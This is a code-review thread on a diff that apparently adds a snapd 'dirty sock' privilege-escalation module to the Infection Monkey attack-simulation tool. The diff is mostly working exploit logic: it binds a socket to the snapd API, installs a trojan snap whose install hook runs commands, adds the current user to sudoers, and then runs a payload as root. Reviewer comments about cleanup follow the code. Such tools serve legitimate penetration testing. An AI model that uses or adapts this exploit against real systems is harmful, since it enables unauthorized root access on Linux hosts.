monkey/infection_monkey/pe/actions/snapd.py

```diff
@@ -0,0 +1,290 @@
+
+    # Create a random name for the dirty socket file
+    sockfile = create_sockfile()
+
+    # Bind the dirty socket to the snapdapi
+    client_sock = bind_sock(sockfile)
+    if not client_sock:
+        return False
+
+    # Delete trojan snap, in case there was a previous install attempt
+    if not delete_snap(client_sock):
+        return False
+
+    # Install the trojan snap, which has an install hook with user supplied commands
+    if not install_snap(client_sock, trojan_snap):
+        return False
+
+    # Delete the trojan snap
+    if not delete_snap(client_sock):
+        return False
+
+    LOG.info("Command Executed Successfully \n")
+    return True
+
+
+class SnapdExploiter(HostPrivExploiter):
+    def __init__(self):
+        self.file_path = ""
+        self.file_name = ""
+        self.runnableEnv = ("ubuntu", "linux")
+
+    def try_priv_esc(self, command_line):
+        """
+        The function takes in the command line to run the monkey as an argument
+        and tries to run the monkey as a root user.
+        :param command_line: The command line to run the monkey in the format {dest_path  MONKEY_ARG  monkey_options}
+        :return: True if the pe is successful
+        """
+        # Check if the exploit can be tried on this distro
+        if not check_system(self.runnableDistro):
+            return False
+
+        self.file_path = command_line.split(' ')[0]
+        self.file_name = self.file_path.split('/')[-1]
+
+        # get the current user name
+        whoami = getpass.getuser()
+
+        # Error reading off shell
+        if not whoami:
+            return False
+
+        # we create a temp file in /tmp as root to verify command exec as root
+        alphabet = string.ascii_lowercase
+        filename = ''.join(random.choice(alphabet) for _ in range(10))
+
+        # add the user to the sudo group
+        add_user_to_sudoers = ADDUSER_TO_SUDOERS % {'user_name': whoami}
+
+        if run_command_as_root(add_user_to_sudoers):
+
+            # check if exploit is successful by touching a file and checking the owner
+            file_path = os.path.join('/tmp/', filename)
+            touch_file = "sudo touch " + file_path
+            shell(touch_file)
+            LOG.info("Touching the file %s" % touch_file)
+            if not check_if_sudoer(file_path):
+                LOG.info("Either file doesn't exist or is not owned by root!")
+                return False
+        else:
+            LOG.info("Snapd Privilege escalation was not successful!")
+            return False
+
+        LOG.info("The command that is executed as root is %s" % add_user_to_sudoers)
+        # now run the monkey as root
+        run_monkey_as_root(command_line)
+
+        # cleaning up the temp file
+        cleanup_file = "rm "+file_path
+        shell(cleanup_file)
+
+        # now remove the user from sudoers
+        LOG.info("Removing the current user %s from the sudoers list", whoami)
```

Comment:
Where do you check if dropper is already running as root? Verify that this module won't simply remove users that were root before monkey even got to the system.

Reply:
@VakarisZ  The exploit appends the current user to the sudoers list and then removes them once the exploit is done. To make sure that we aren't deleting any other users / other data when the exploit fails, Checks are made before this call. A file is created and only if the owner of the file is root, then the entry is deleted.

Reply:
I'm asking what if the user is ALREADY root? Doesn't this exploiter add user to sudoers (say, user was already a sudoer) and after the monkey user is removed from sudoers. So a user started as sudoer, but ended up being standard user after monkey finished. Verify this doesn't happen.